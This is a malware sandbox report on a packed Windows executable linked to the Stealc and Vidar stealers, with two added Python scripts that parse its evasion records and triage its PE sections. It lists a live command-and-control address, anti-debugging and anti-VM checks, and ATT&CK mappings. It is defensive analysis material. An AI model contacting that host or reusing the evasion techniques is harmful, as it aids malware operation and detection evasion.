                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C3DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C31160 GetSystemInfo,ExitProcess,0_2_00C31160
                Source: file.exe, file.exe, 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1312008954.0000000001A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWn
                Source: file.exe, 00000000.00000002.1312008954.0000000001A25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1312008954.0000000001A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware.
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13541
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13549
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13527
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13530
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13581
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C345C0 VirtualProtect ?,00000004,00000100,000000000_2_00C345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C49860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49750 mov eax, dword ptr fs:[00000030h]0_2_00C49750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C478E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00C478E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard
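The RDTSC interceptor records in the Malware Analysis System Evasion section above and the debugger and monitoring-tool probes in this Anti Debugging section are easier to work with once parsed. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not Joe Sandbox's own code. It strips the "Jump to behavior" link text that the HTML-to-text extraction leaves on some lines, splits each RDTSC record into the two rdtsc sites and the filler instructions between them (the push/pop padding and jmp chains are what makes the timing delta awkward to emulate), buckets the sites by 1 MiB region, and maps each probed window class or device name to the tool it identifies: gbdyllo is ollydbg spelled backwards, and NTICE, SICE and SIWVID are the SoftICE driver device names. The category names and tool labels are this example's own choice, and the sample lines are copied from the report above.

```python
import re
from collections import Counter

# Constructed sample: behaviour lines copied from the report above, three of them still
# carrying the "Jump to behavior" link text that the HTML-to-text extraction leaves behind.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B0248 second address: 10B024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57702F7 second address: 5770381 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8114D9D200h 0x00000008 sub eax, 62B51ED8h 0x0000000e jmp 00007F8114D9D1FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F8114D9D206h 0x0000001d push eax 0x0000001e jmp 00007F8114D9D1FBh 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F8114D9D204h 0x0000002b and cl, FFFFFF98h 0x0000002e jmp 00007F8114D9D1FBh 0x00000033 popfd 0x00000034 mov di, si 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F8114D9D201h 0x00000041 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E91BDB instructions caused by: Self-modifying code",
    r"Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior",
]

RESIDUE = "Jump to behavior"
RDTSC_RE = re.compile(
    r"RDTSC instruction interceptor: First address: ([0-9A-Fa-f]+) "
    r"second address: ([0-9A-Fa-f]+) instructions: (.*)$"
)
# Every disassembled instruction is prefixed with its byte offset, e.g. "0x0000000e jmp ...".
OFFSET_RE = re.compile(r"\s*0x[0-9a-f]{8}\s+")

# Window titles / class names and device names probed by the sample (as listed in the
# report), mapped to the analysis tool each one identifies.
WINDOW_MARKERS = {
    "ollydbg": "OllyDbg",
    "gbdyllo": "OllyDbg",  # "ollydbg" spelled backwards
    "procmon_window_class": "Process Monitor",
    "process monitor - sysinternals: www.sysinternals.com": "Process Monitor",
    "regmonclass": "Regmon",
    "registry monitor - sysinternals: www.sysinternals.com": "Regmon",
    "filemonclass": "Filemon",
    "file monitor - sysinternals: www.sysinternals.com": "Filemon",
}
DEVICE_MARKERS = {"NTICE": "SoftICE", "SICE": "SoftICE", "SIWVID": "SoftICE"}

# (substring, category) pairs; category names are this example's own.
CATEGORY_RULES = [
    ("RDTSC instruction interceptor", "rdtsc-timing"),
    ("Self-modifying code", "self-modifying-code"),
    ("Registry key queried", "registry-vm-check"),
    ("Open window title or class name", "analysis-tool-window"),
    ("File opened:", "debugger-device"),
    ("Process queried: DebugPort", "debugport-query"),
    ("Thread information set: HideFromDebugger", "thread-hide-from-debugger"),
]


def clean(line):
    """Drop the 'Jump to behavior' link text and surrounding whitespace."""
    line = line.strip()
    if line.endswith(RESIDUE):
        line = line[: -len(RESIDUE)]
    return line.rstrip()


def parse_rdtsc(line):
    """Return the two rdtsc sites and the filler between them, or None for other lines."""
    m = RDTSC_RE.search(clean(line))
    if not m:
        return None
    first, second = int(m.group(1), 16), int(m.group(2), 16)
    insns = [s for s in OFFSET_RE.split(m.group(3)) if s]
    if not insns or insns[0] != "rdtsc" or insns[-1] != "rdtsc":
        raise ValueError("record does not start and end with rdtsc: %r" % line)
    filler = insns[1:-1]
    branches = [i for i in filler if i.split()[0].startswith("j")]  # jmp / jcc padding
    return {
        "first": first,
        "second": second,
        "span": second - first,  # bytes between the two rdtsc sites
        "filler": filler,
        "branches": len(branches),
        "region": "0x%08X" % (first & ~0xFFFFF),  # 1 MiB bucket of the first site
    }


def classify(line):
    body = clean(line)
    return next((cat for needle, cat in CATEGORY_RULES if needle in body), "other")


def detected_tool(line):
    body = clean(line)
    m = re.search(r"Open window title or class name: (.+)$", body)
    if m:
        return WINDOW_MARKERS.get(m.group(1).strip().lower())
    m = re.search(r"File opened: (\S+)$", body)
    if m:
        return DEVICE_MARKERS.get(m.group(1).upper())
    return None


def summarize(lines):
    cats, tools, regions, max_filler = Counter(), Counter(), Counter(), 0
    for line in lines:
        cats[classify(line)] += 1
        tool = detected_tool(line)
        if tool:
            tools[tool] += 1
        rec = parse_rdtsc(line)
        if rec:
            regions[rec["region"]] += 1
            max_filler = max(max_filler, len(rec["filler"]))
    return {"categories": cats, "tools": tools,
            "rdtsc_regions": regions, "rdtsc_max_filler": max_filler}


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(key, dict(value) if isinstance(value, Counter) else value)
```

Feeding the whole report to summarize() (one behaviour line per element) gives the per-category counts and the region histogram. On this report the rdtsc pairs sit in the 0x010xxxxx to 0x011xxxxx range of the loaded image, with a separate cluster at 0x0577xxxx, and the longest filler between two reads is the 25-instruction, seven-jmp chain at 57702F7, which is the kind of record worth opening first when deciding where to patch the timing check out.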

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C49600
                Source: file.exe, file.exe, 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C47B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00C47980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C47850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C47A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.c30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1268244294.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1268244294.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix

The matrix is flattened in the source. Only techniques with matched signatures are listed below, grouped by tactic; the number in front of each technique is the signature count the report shows for that cell. Unmatched cells of the matrix are the standard ATT&CK scaffold and are omitted.

Execution: 2 Command and Scripting Interpreter; 11 Native API
Persistence: 1 DLL Side-Loading
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Collection: 1 Archive Collected Data
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no matched techniques
Antivirus, Machine Learning and Genetic Malware Detection

Initial sample (Source | Detection | Scanner | Label):
file.exe | 45% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML

Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label):
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware

Domains and IPs

Contacted domains: No contacted domains info

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation). The single characters after .php in several entries (2, B, &, D, j) are adjacent memory bytes carved together with the string, not distinct C2 paths:
http://185.215.113.37/e2b1563c6670f193.php | file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | true | none | unknown
http://185.215.113.37/e2b1563c6670f193.php2 | file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | true | none | unknown
http://185.215.113.37/e2b1563c6670f193.phpB | file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | true | none | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1312008954.00000000019DE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php& | file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | true | none | unknown
http://185.215.113.37/e2b1563c6670f193.phpD | file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | true | none | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | true | none | unknown
http://185.215.113.37/e2b1563c6670f193.phpj | file.exe, 00000000.00000002.1312008954.0000000001A38000.00000004.00000020.00020000.00000000.sdmp | true | none | unknown

Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1528566
                              Start date and time:2024-10-08 02:09:04 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 4s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 18
                              • Number of non-executed functions: 92
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • VT rate limit hit for: file.exe
                              No simulations
Context

IPs (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
185.215.113.37 | ten earlier submissions named file.exe | malicious | Stealc (6 samples), Stealc, Vidar (4 samples) | all contacted 185.215.113.37/e2b1563c6670f193.php

Domains: No context

ASNs (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
WHOLESALECONNECTIONSNL | the same ten file.exe submissions | malicious | Stealc (6 samples), Stealc, Vidar (4 samples) | all contacted 185.215.113.37

JA3 Fingerprints: No context

Dropped Files: No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.947534593862265
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'811'968 bytes
                              MD5:a5d18ff9a3069cd251170021b5a0da87
                              SHA1:2bf3ebe6be6c5a2892335cee98d6e338506458d0
                              SHA256:5ec5e0e9c3636bbf6380c00672bf9c8fb36ec1aef7095cc051243ad8830ca23a
                              SHA512:51a1036943915e37718fe42c6d47c7e3aa4d8a3e0ff585a4cbe97b5a88b12090098825d29904a1bcef85927a1dd21617a6d58969affea579710b0745a91e68cc
                              SSDEEP:49152:2mzg6C1fd9KfQElGmLW0snxkSU2ODwJB:2m0x1fOD608hU2ODwJB
                              TLSH:AB8533803A7BD7D5ED5C423374AD544C384903C441AEFBD52A1B26ABF38A7EF496A0C5
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0xa8c000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (entry point preview)
jmp 00007F8114D83EEAh
je 00007F8114D83F01h
add byte ptr [eax], al
jmp 00007F8114D85EE5h
add byte ptr [eax], al
(the rest of the preview is 0x00 padding; every remaining instruction decodes as add byte ptr [eax], al)
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Data directories (Name | Virtual Address | Virtual Size | Is in Section):
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
All other entries (EXPORT, RESOURCE, EXCEPTION, SECURITY, DEBUG, COPYRIGHT, GLOBALPTR, TLS, LOAD_CONFIG, BOUND_IMPORT, IAT, DELAY_IMPORT, COM_DESCRIPTOR, RESERVED) | 0x0 | 0x0 | none
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics):
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 18677f6caf1fe1fc31307d1c4187caf6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x298000 | 0x200 | ee54d2bced4e9ef1fb5d1cf7a4ac05b4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iobnflrc | 0x4f6000 | 0x195000 | 0x194400 | e06b9427a183b458ae58d45d9a00abdf | False | 0.9950398838512677 | data | 7.954448270760046 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wmcwbjql | 0x68b000 | 0x1000 | 0x400 | 69d4e1154289edcdeeb82a3b0d824000 | False | 0.810546875 | data | 6.287836181069777 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68c000 | 0x3000 | 0x2200 | 105b1756482896c211a78104af5e7b88 | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports (DLL | Import):
kernel32.dll | lstrcpy
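The section table, entry point and import table above are the static indicators a triage script acts on before any dynamic analysis. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it takes the section table as the report lists it (addresses, sizes and IMAGE_SCN_* flags copied from the table, entropy where the report gives a value) and applies the packer heuristics behind the "Entry point lies outside standard sections" and "PE file contains section with special chars" signatures: RWX sections, unnamed or non-standard section names, entropy above 7 bits, a virtual size far larger than the raw size (room for code unpacked at run time), an entry point in a section without the CODE flag, and an import table with only a handful of entries. The thresholds (7.0 bits, 1 MiB of unbacked virtual size, fewer than five imports) are my own triage conventions, not values taken from the report.

```python
from collections import namedtuple

# IMAGE_SCN_* characteristics bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Section names a compiler/linker normally emits; anything else deserves a look.
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                          ".reloc", ".bss", ".tls", ".pdata", ".CRT"}

Section = namedtuple("Section", "name va vsize rawsize entropy chars")

# Sample input: the section table from the report above. entropy is None where the
# report prints "unknown". The flag combinations are the ones the report lists.
INIT_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
INIT_RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | RWX
REPORT_SECTIONS = [
    Section("",         0x1000,   0x25b000, 0x22800,  None,  INIT_RWX),
    Section(".rsrc",    0x25c000, 0x1000,   0x0,      0.0,   INIT_RW),
    Section(".idata",   0x25d000, 0x1000,   0x200,    0.906, INIT_RW),
    Section("",         0x25e000, 0x298000, 0x200,    None,  INIT_RWX),
    Section("iobnflrc", 0x4f6000, 0x195000, 0x194400, 7.954, INIT_RWX),
    Section("wmcwbjql", 0x68b000, 0x1000,   0x400,    6.288, INIT_RWX),
    Section(".taggant", 0x68c000, 0x3000,   0x2200,   0.020, INIT_RWX),
]
ENTRY_POINT_RVA = 0xa8c000 - 0x400000  # report: Entrypoint 0xa8c000, Imagebase 0x400000
IMPORT_COUNT = 1                        # report: the only import is kernel32!lstrcpy

# Triage thresholds: my own conventions, not values from the report.
HIGH_ENTROPY = 7.0
LARGE_UNBACKED_BYTES = 0x100000
SPARSE_IMPORTS = 5

FLAG_LABELS = [(IMAGE_SCN_CNT_CODE, "CODE"), (IMAGE_SCN_CNT_INITIALIZED_DATA, "DATA"),
               (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"), (IMAGE_SCN_MEM_EXECUTE, "X")]


def describe_flags(chars):
    """Render the characteristics bits as a short CODE/DATA/R/W/X string."""
    return "+".join(label for flag, label in FLAG_LABELS if chars & flag)


def entry_section(sections, entry_rva):
    """Return the Section whose virtual range contains the entry-point RVA, or None."""
    for sec in sections:
        if sec.va <= entry_rva < sec.va + sec.vsize:
            return sec
    return None


def triage_sections(sections, entry_rva, import_count):
    """Return a list of (rule, section name) findings for a PE section table."""
    findings = []
    ep = entry_section(sections, entry_rva)
    if ep is None:
        findings.append(("entry_point_outside_sections", None))
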